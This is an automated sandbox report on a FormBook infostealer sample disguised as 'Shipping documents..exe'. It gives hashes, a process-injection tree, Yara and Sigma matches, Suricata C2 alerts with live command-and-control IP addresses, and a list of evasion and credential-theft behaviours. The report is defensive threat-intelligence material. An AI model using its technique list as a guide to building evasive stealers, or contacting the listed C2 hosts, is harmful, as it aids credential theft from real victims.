
Windows Analysis Report
Shipping documents..exe

Overview

General Information

Sample name: Shipping documents..exe
Analysis ID: 1549915
MD5: 3fbab2b42254852fc8d71f14b2862a43
SHA1: 51b8d33a892260ec1d0d5aee4971998756532f0c
SHA256: 0452cf013ff76bb1e537ac2b17b081fc2eaf7c5d302f3e838e1e854de2850896
Tags: exe, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Shipping documents..exe (PID: 764 cmdline: "C:\Users\user\Desktop\Shipping documents..exe" MD5: 3FBAB2B42254852FC8D71F14B2862A43)
    • svchost.exe (PID: 3924 cmdline: "C:\Users\user\Desktop\Shipping documents..exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FuFneNIzDsF.exe (PID: 6116 cmdline: "C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 6940 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 6812 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • FuFneNIzDsF.exe (PID: 4156 cmdline: "C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source                                                                                  Rule                    Description             Author        Strings
00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
Source                               Rule                    Description             Author        Strings
2.2.svchost.exe.400000.0.unpack      JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
2.2.svchost.exe.400000.0.raw.unpack  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ParentImage: C:\Users\user\Desktop\Shipping documents..exe, ParentProcessId: 764, ParentProcessName: Shipping documents..exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ProcessId: 3924, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ParentImage: C:\Users\user\Desktop\Shipping documents..exe, ParentProcessId: 764, ParentProcessName: Shipping documents..exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ProcessId: 3924, ProcessName: svchost.exe
Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP   Destination Port  Protocol
2024-11-06T08:39:13.534070+0100  2022930  1         A Network Trojan was detected  20.12.23.50      443          192.168.2.6      49753             TCP
2024-11-06T08:39:51.605543+0100  2022930  1         A Network Trojan was detected  20.12.23.50      443          192.168.2.6      49957             TCP

Timestamp                        SID      Severity  Classtype                                      Source IP        Source Port  Destination IP   Destination Port  Protocol
2024-11-06T08:39:43.494387+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      49911        154.92.61.37     80                TCP
2024-11-06T08:40:07.142021+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      49986        3.33.130.190     80                TCP
2024-11-06T08:40:20.672098+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      49990        203.161.49.193   80                TCP
2024-11-06T08:40:34.357565+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      49995        3.33.130.190     80                TCP
2024-11-06T08:40:47.887323+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      49999        3.33.130.190     80                TCP
2024-11-06T08:41:01.413455+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50003        198.252.98.54    80                TCP
2024-11-06T08:41:15.086787+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50008        103.224.182.242  80                TCP
2024-11-06T08:41:29.435247+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50012        154.23.184.218   80                TCP
2024-11-06T08:41:43.525575+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50016        31.31.196.17     80                TCP
2024-11-06T08:41:57.262565+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50020        13.248.169.48    80                TCP
2024-11-06T08:42:11.112133+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50024        217.76.156.252   80                TCP
2024-11-06T08:42:25.010909+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50029        161.97.142.144   80                TCP
2024-11-06T08:42:38.520024+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50033        199.59.243.227   80                TCP
2024-11-06T08:42:52.287067+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.6      50037        188.114.97.3     80                TCP

Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP   Destination Port  Protocol
2024-11-06T08:39:43.494387+0100  2855465  1         A Network Trojan was detected  192.168.2.6      49911        154.92.61.37     80                TCP
2024-11-06T08:40:07.142021+0100  2855465  1         A Network Trojan was detected  192.168.2.6      49986        3.33.130.190     80                TCP
2024-11-06T08:40:20.672098+0100  2855465  1         A Network Trojan was detected  192.168.2.6      49990        203.161.49.193   80                TCP
2024-11-06T08:40:34.357565+0100  2855465  1         A Network Trojan was detected  192.168.2.6      49995        3.33.130.190     80                TCP
2024-11-06T08:40:47.887323+0100  2855465  1         A Network Trojan was detected  192.168.2.6      49999        3.33.130.190     80                TCP
2024-11-06T08:41:01.413455+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50003        198.252.98.54    80                TCP
2024-11-06T08:41:15.086787+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50008        103.224.182.242  80                TCP
2024-11-06T08:41:29.435247+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50012        154.23.184.218   80                TCP
2024-11-06T08:41:43.525575+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50016        31.31.196.17     80                TCP
2024-11-06T08:41:57.262565+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50020        13.248.169.48    80                TCP
2024-11-06T08:42:11.112133+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50024        217.76.156.252   80                TCP
2024-11-06T08:42:25.010909+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50029        161.97.142.144   80                TCP
2024-11-06T08:42:38.520024+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50033        199.59.243.227   80                TCP
2024-11-06T08:42:52.287067+0100  2855465  1         A Network Trojan was detected  192.168.2.6      50037        188.114.97.3     80                TCP

Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP   Destination Port  Protocol
2024-11-06T08:40:00.378127+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49983        3.33.130.190     80                TCP
2024-11-06T08:40:02.083678+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49984        3.33.130.190     80                TCP
2024-11-06T08:40:04.597512+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49985        3.33.130.190     80                TCP
2024-11-06T08:40:13.021440+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49987        203.161.49.193   80                TCP
2024-11-06T08:40:15.547543+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49988        203.161.49.193   80                TCP
2024-11-06T08:40:18.109970+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49989        203.161.49.193   80                TCP
2024-11-06T08:40:26.374694+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49991        3.33.130.190     80                TCP
2024-11-06T08:40:28.933962+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49993        3.33.130.190     80                TCP
2024-11-06T08:40:31.782789+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49994        3.33.130.190     80                TCP
2024-11-06T08:40:40.033394+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49996        3.33.130.190     80                TCP
2024-11-06T08:40:42.594794+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49997        3.33.130.190     80                TCP
2024-11-06T08:40:45.156854+0100  2855464  1         A Network Trojan was detected  192.168.2.6      49998        3.33.130.190     80                TCP
2024-11-06T08:40:53.673384+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50000        198.252.98.54    80                TCP
2024-11-06T08:40:56.299646+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50001        198.252.98.54    80                TCP
2024-11-06T08:40:59.697416+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50002        198.252.98.54    80                TCP
2024-11-06T08:41:07.459323+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50005        103.224.182.242  80                TCP
2024-11-06T08:41:10.004531+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50006        103.224.182.242  80                TCP
2024-11-06T08:41:12.550081+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50007        103.224.182.242  80                TCP
2024-11-06T08:41:21.763239+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50009        154.23.184.218   80                TCP
2024-11-06T08:41:24.322356+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50010        154.23.184.218   80                TCP
2024-11-06T08:41:26.871250+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50011        154.23.184.218   80                TCP
2024-11-06T08:41:35.712995+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50013        31.31.196.17     80                TCP
2024-11-06T08:41:38.228622+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50014        31.31.196.17     80                TCP
2024-11-06T08:41:40.806800+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50015        31.31.196.17     80                TCP
2024-11-06T08:41:49.471369+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50017        13.248.169.48    80                TCP
2024-11-06T08:41:52.009629+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50018        13.248.169.48    80                TCP
2024-11-06T08:41:54.616427+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50019        13.248.169.48    80                TCP
2024-11-06T08:42:03.545297+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50021        217.76.156.252   80                TCP
2024-11-06T08:42:06.056427+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50022        217.76.156.252   80                TCP
2024-11-06T08:42:08.558522+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50023        217.76.156.252   80                TCP
2024-11-06T08:42:17.393054+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50026        161.97.142.144   80                TCP
2024-11-06T08:42:19.926700+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50027        161.97.142.144   80                TCP
2024-11-06T08:42:22.488516+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50028        161.97.142.144   80                TCP
2024-11-06T08:42:30.853335+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50030        199.59.243.227   80                TCP
2024-11-06T08:42:33.416565+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50031        199.59.243.227   80                TCP
2024-11-06T08:42:35.970041+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50032        199.59.243.227   80                TCP
2024-11-06T08:42:44.567492+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50034        188.114.97.3     80                TCP
2024-11-06T08:42:47.149297+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50035        188.114.97.3     80                TCP
2024-11-06T08:42:49.751293+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50036        188.114.97.3     80                TCP
2024-11-06T08:42:58.661949+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50038        3.33.130.190     80                TCP
2024-11-06T08:43:01.193658+0100  2855464  1         A Network Trojan was detected  192.168.2.6      50039        3.33.130.190     80                TCP


                AV Detection

Source: Shipping documents..exe; ReversingLabs: Detection: 42%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Shipping documents..exe; Joe Sandbox ML: detected
Source: Shipping documents..exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FuFneNIzDsF.exe, 00000004.00000002.4559487578.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507028325.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 6_2_0299C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0299C810
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 4x nop then xor eax, eax 6_2_02989F20
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 4x nop then pop edi 6_2_0298E50B
Source: C:\Windows\SysWOW64\ktmutil.exe; Code function: 4x nop then mov ebx, 00000004h 6_2_031C04DF

                Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49911 -> 154.92.61.37:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49911 -> 154.92.61.37:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50016 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50016 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49986 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49986 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49984 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 31.31.196.17:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 198.252.98.54:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50024 -> 217.76.156.252:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 154.23.184.218:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 103.224.182.242:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50033 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50033 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49990 -> 203.161.49.193:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 3.33.130.190:80
